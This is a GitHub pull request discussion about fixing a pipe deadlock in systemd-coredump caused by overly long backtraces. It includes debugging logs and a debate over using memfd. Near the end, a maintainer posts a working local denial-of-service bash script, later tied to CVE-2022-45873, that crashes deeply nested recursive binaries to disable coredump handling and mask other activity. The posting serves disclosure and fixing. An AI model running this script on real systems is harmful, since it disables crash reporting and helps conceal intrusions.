Fix coredump deadlock with overly long backtraces #25055

Merged
3 commits merged into systemd:main from coredump-deadlock on Oct 19, 2022

Conversation

keszybz (Member) commented Oct 18, 2022

No description provided.

keszybz added this to the v252 milestone Oct 18, 2022
src/shared/elf-util.c (review comment, resolved)
yuwata approved these changes Oct 18, 2022
AdamWill (Contributor) commented Oct 19, 2022

so I tried a systemd with this patch on a gnome-calendar crash, and still didn't get a coredump, probably because:

Oct 18 18:24:21 fedora systemd[1]: Started systemd-coredump@0-2842-0.service - Process Core Dump (PID 2842/UID 0).
....
Oct 18 18:29:21 fedora systemd[1]: systemd-coredump@0-2842-0.service: Service reached runtime time limit. Stopping.
Oct 18 18:29:21 fedora systemd[1]: systemd-coredump@0-2842-0.service: Failed with result 'timeout'.

so it took over five minutes to deal with the core dump, and timed out...

keszybz (Member, author) commented Oct 19, 2022

> so I tried a systemd with this patch on a gnome-calendar crash, and still didn't get a coredump, probably because:
> Oct 18 18:29:21 fedora systemd[1]: systemd-coredump@0-2842-0.service: Failed with result 'timeout'.

On my machine, generating the crash takes 5 seconds. So if it timed out, either something is wrong with the patch, or it wasn't applied properly, or there's some other bug. I'll test my patch again here.

Edit: yeah, it seems to work fine here.

$ journalctl -b _PID=2667772 -o cat | head 
Process 2667524 (3) of user 1000 dumped core.

Module linux-vdso.so.1 with build-id b21929a49b68b52a4059932eb797eb7182e48f08
Module libopensc.so.8 with build-id 7e70dbbc60cc7358472bcd2a198f1d548af8ab62
Metadata for module libopensc.so.8 owned by FDO found: {
	"type" : "rpm",
	"name" : "opensc",
	"version" : "0.22.0-7.fc37",
	"architecture" : "x86_64",
	"osCpe" : "cpe:/o:fedoraproject:fedora:37"
$ journalctl -b _PID=2667772 -o cat | wc  -c
69644

keszybz force-pushed the coredump-deadlock branch 2 times, most recently from 37cd36a to 1d89509, Oct 19, 2022
keszybz (Member, author) commented Oct 19, 2022

 Assertion 'f = fmemopen_unlocked((void*) "", 0, "r")' failed at src/test/test-json.c:351, function test_json_parse_file_empty(). Aborting.

I'm not sure why this fails. It works for me locally and reading the man page, it should work. I changed it to open /dev/null instead.
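For illustration, a small standalone sketch of the two approaches, using plain fmemopen() rather than systemd's fmemopen_unlocked() wrapper; whether a zero-length buffer is accepted appears to vary between C library versions, which would explain the difference between CI and the local run:

/* Sketch only: some C library versions reject a zero-length fmemopen()
 * buffer with EINVAL, so /dev/null is the portable way to get an empty
 * read-only stream. */
#include <stdio.h>

int main(void) {
        FILE *f = fmemopen((void*) "", 0, "r");  /* may fail on some libcs */
        if (!f)
                f = fopen("/dev/null", "re");    /* "e" = O_CLOEXEC (glibc extension) */
        if (!f)
                return 1;

        printf("first read hits EOF: %s\n", fgetc(f) == EOF ? "yes" : "no");
        fclose(f);
        return 0;
}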

yuwata added the good-to-merge/waiting-for-ci label Oct 19, 2022
keszybz added 2 commits Oct 19, 2022
It is useful to distinguish whether json_parse_file() got no input or invalid input.
Use different return codes for the two cases.
We would deadlock when passing the data from the forked-off process that was
doing backtrace generation back to the coredump parent. This is because we
fork the child and wait for it to exit, while the child tries to write too
much data to the output pipe: after the first 64k the child blocks, because
the pipe is full and the parent has not started reading yet. The bug surfaced
in Fedora because of a combination of four factors:
- 8770778 was backported to v251.5, which
  allowed coredump processing to be successful.
- 1a0281a was NOT backported, so the output
  was very verbose.
- Fedora has the ELF package metadata available, so a lot of output can be
  generated. Most other distros just don't have this information.
- gnome-calendar crashes, has a bazillion modules, and 69596 bytes of output
  are generated for it.

Fixes https://bugzilla.redhat.com/show_bug.cgi?id=2135778.

The code is changed to try to write data opportunistically. If we get partial
information, that is still logged. It is generally better to log partial
backtrace information than nothing at all.
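To make the failure mode concrete, here is a minimal standalone sketch of the deadlock pattern described above. It is illustrative only, not the systemd code; the buffer sizes are assumptions based on the default 64K pipe capacity on Linux.

/* Minimal sketch of the deadlock: the parent waits for the child to exit
 * before reading, while the child blocks writing to the full pipe. */
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void) {
        int pipefd[2];
        if (pipe(pipefd) < 0)
                return 1;

        pid_t pid = fork();
        if (pid < 0)
                return 1;

        if (pid == 0) {
                /* Child: produce more output than the default 64K pipe buffer.
                 * Once the buffer is full, write() blocks until someone reads. */
                close(pipefd[0]);
                char buf[4096];
                memset(buf, 'x', sizeof(buf));
                for (int i = 0; i < 32; i++)  /* 128K, more than the pipe holds */
                        if (write(pipefd[1], buf, sizeof(buf)) < 0)
                                _exit(1);
                close(pipefd[1]);
                _exit(0);
        }

        /* Parent: waits for the child to exit *before* reading the pipe.
         * The child is stuck in write(), so waitpid() never returns. */
        close(pipefd[1]);
        waitpid(pid, NULL, 0);

        /* Never reached: the read loop comes too late to help. */
        char buf[4096];
        while (read(pipefd[0], buf, sizeof(buf)) > 0)
                ;
        close(pipefd[0]);
        return 0;
}

The PR keeps the pipe but, per the commit message, makes the child's writes opportunistic, so partial output is still logged rather than deadlocking.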
poettering (Member) commented Oct 19, 2022

Hmm, usually when reading output from a child we wait for EOF on that before waiting for the exit code of the child. Here it is done the other way round, which is the bug, no?

keszybz (Member, author) commented Oct 19, 2022

> Hmm, usually when reading output from a child we wait for EOF on that before waiting for the exit code of the child. Here it is done the other way round, which is the bug, no?

I considered that too. We could read and accumulate input from the child until EOF. But that'd make the receiving side more complicated, because it'd need to grow a buffer, do a loop, and so on. But realistically, I don't think this is useful. The child generates the whole string first, so it knows how big it is, and can size the pipe appropriately. And also, the output should not be arbitrarily long. After all, we're going to stuff this in the journal, and we don't want to put a million lines in the message. So a more generic transfer mechanism would be more complicated but it wouldn't really give us any gains.
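For comparison, a rough sketch of the read-until-EOF-then-reap pattern discussed here; read_all_then_reap() is a hypothetical helper, not code from the PR, and mainly shows the growing buffer and read loop the receiving side would need:

/* Hypothetical sketch: the parent drains the pipe until EOF and only then
 * reaps the child, so the child can never block on a full pipe. */
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

static char *read_all_then_reap(int fd, pid_t child, size_t *ret_size) {
        size_t size = 0, allocated = 0;
        char *buf = NULL;

        for (;;) {
                if (size + 4096 > allocated) {
                        allocated = size + 4096;
                        char *t = realloc(buf, allocated);
                        if (!t) {
                                free(buf);
                                return NULL;
                        }
                        buf = t;
                }

                ssize_t n = read(fd, buf + size, 4096);
                if (n < 0) {
                        free(buf);
                        return NULL;
                }
                if (n == 0)  /* EOF: the child closed its end of the pipe */
                        break;

                size += (size_t) n;
        }

        /* Only now wait for the exit code; the child has already finished writing. */
        waitpid(child, NULL, 0);

        *ret_size = size;
        return buf;
}

As noted above, this keeps the receiver free of the pipe-size limit, but at the cost of buffer management on a code path whose output is supposed to stay bounded anyway.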

bluca approved these changes Oct 19, 2022
mrc0mmand (Member) commented Oct 19, 2022

The C8S failure is unrelated (#25060).

poettering (Member) commented Oct 19, 2022

hmm, one question: maybe the transfer mechanism should not actually be a pipe, but a memfd? a memfd can auto-grow and we wouldn't be subject to pipe size limits? i.e. instead of a pipe, just allocate a memfd, and pass it to the child? child writes its stuff there. afterwards we seek back to the front and read it?

I think the code would be more robust and even simpler?
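A rough sketch of that idea, assuming memfd_create() (Linux 3.17+, exposed by glibc 2.27+); this only illustrates the proposal and is not what the PR implements:

/* Illustrative only: the parent creates a memfd, the child writes into it
 * (it grows like ordinary memory, no pipe-size limit), and after the child
 * exits the parent seeks back to the start and reads everything. */
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void) {
        int fd = memfd_create("backtrace", MFD_CLOEXEC);
        if (fd < 0)
                return 1;

        pid_t pid = fork();
        if (pid < 0)
                return 1;

        if (pid == 0) {
                /* Child: write as much as needed; nothing here can block. */
                for (int i = 0; i < 100000; i++)
                        dprintf(fd, "frame #%d\n", i);
                _exit(0);
        }

        /* Parent: waiting first is now safe; then rewind and read it all. */
        waitpid(pid, NULL, 0);
        if (lseek(fd, 0, SEEK_SET) < 0)
                return 1;

        char buf[4096];
        ssize_t n;
        while ((n = read(fd, buf, sizeof(buf))) > 0)
                fwrite(buf, 1, (size_t) n, stdout);

        close(fd);
        return 0;
}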

poettering (Member) commented Oct 19, 2022

memfds are Linux 3.17 stuff, which is older than our recommended baseline, hence I think it would be OK to simply use them?

poettering (Member) commented Oct 19, 2022

memfds are just memory that is accounted like other memory, so they're generally a good idea to use, since they're less special than pipes.

bluca (Member) commented Oct 19, 2022

> hmm, one question: maybe the transfer mechanism should not actually be a pipe, but a memfd? a memfd can auto-grow and we wouldn't be subject to pipe size limits? i.e. instead of a pipe, just allocate a memfd, and pass it to the child? child writes its stuff there. afterwards we seek back to the front and read it?
>
> I think the code would be more robust and even simpler?

Probably best to leave that for the next release, and just fix the bug as-is for 252? It's a different model, so there is inherent risk of introducing new regressions by changing over.

poettering (Member) commented Oct 19, 2022

dunno i think switching this to memfds will remove the entire category of bug here, instead of just trying to massage it to not happen anymore.

bluca (Member) commented Oct 19, 2022

> dunno i think switching this to memfds will remove the entire category of bug here, instead of just trying to massage it to not happen anymore.

Yes, but it could introduce new bugs that we aren't aware of - post-rc2 is late, surely it can wait a couple of weeks till after the next release?

keszybz (Member, author) commented Oct 19, 2022

The CentOS CI failure (CentOS Stream 8) is TEST-15-DROPIN, i.e. #25060. Not related.

> Yes, but it could introduce new bugs that we aren't aware of - post-rc2 is late, surely it can wait a couple of weeks till after the next release?

Yep. I think we should merge this. Memfd might be nicer, but it'll likely touch a lot of code and has higher potential for regressions.

bluca merged commit 875c0bd into systemd:main Oct 19, 2022
45 of 46 checks passed
keszybz deleted the coredump-deadlock branch Oct 19, 2022
keszybz removed the good-to-merge/waiting-for-ci label Oct 19, 2022
AdamWill (Contributor) commented Oct 19, 2022

> > so I tried a systemd with this patch on a gnome-calendar crash, and still didn't get a coredump, probably because:
> > Oct 18 18:29:21 fedora systemd[1]: systemd-coredump@0-2842-0.service: Failed with result 'timeout'.
>
> On my machine, generating the crash takes 5 seconds. So if it timed out, either something is wrong with the patch, or it wasn't applied properly, or there's some other bug. I'll test my patch again here.
>
> Edit: yeah, it seems to work fine here.
>
> $ journalctl -b _PID=2667772 -o cat | head
> Process 2667524 (3) of user 1000 dumped core.
>
> Module linux-vdso.so.1 with build-id b21929a49b68b52a4059932eb797eb7182e48f08
> Module libopensc.so.8 with build-id 7e70dbbc60cc7358472bcd2a198f1d548af8ab62
> Metadata for module libopensc.so.8 owned by FDO found: {
>     "type" : "rpm",
>     "name" : "opensc",
>     "version" : "0.22.0-7.fc37",
>     "architecture" : "x86_64",
>     "osCpe" : "cpe:/o:fedoraproject:fedora:37"
> $ journalctl -b _PID=2667772 -o cat | wc -c
> 69644

Hmm, that's odd. Note I did a build of the systemd from F37, so 251, with the patch backported. But yeah, then all I did was make gnome-calendar crash and wait. I did do it in a VM with 2G of RAM, so maybe that was a problem...

evverx (Member) commented Nov 14, 2022

Just to make it easier to fill out some form, I'll leave here a script that brings down systemd-coredump on Fedora 36 with systemd 250.8 (as any local user). Combined with #24139 it can be used to totally hide any weird activity where segfaults, coredumps and stuff like that are involved. The idea is to crash a binary that calls the same function recursively, and to put it in a deeply nested directory so that its backtrace is large enough to trigger the deadlock. It's run 16 times because of

MaxConnections=16

#!/bin/bash
set -ex

# Allow core dumps to be generated.
ulimit -c unlimited

d=$(mktemp -d)
pushd "$d"

# A binary that crashes via unbounded recursion (stack overflow).
cat <<'EOL' >hey.c
void f() { f(); }
int main(int argc, char *argv[]) {
    f();
    return 0;
}
EOL

gcc hey.c

# Bury the binary under ten levels of 255-character directory names so the
# module paths in the generated backtrace become very long.
a=$(perl -e 'print "A" x 255')
for i in {1..10}; do
    mkdir "$a"
    mv a.out "$a"
    cd "$a"
done

# Crash it 16 times to occupy all of systemd-coredump's connection slots.
for i in {1..16}; do
    ./a.out &
done

evverx (Member) commented Nov 23, 2022

61aea45 got CVE-2022-45873
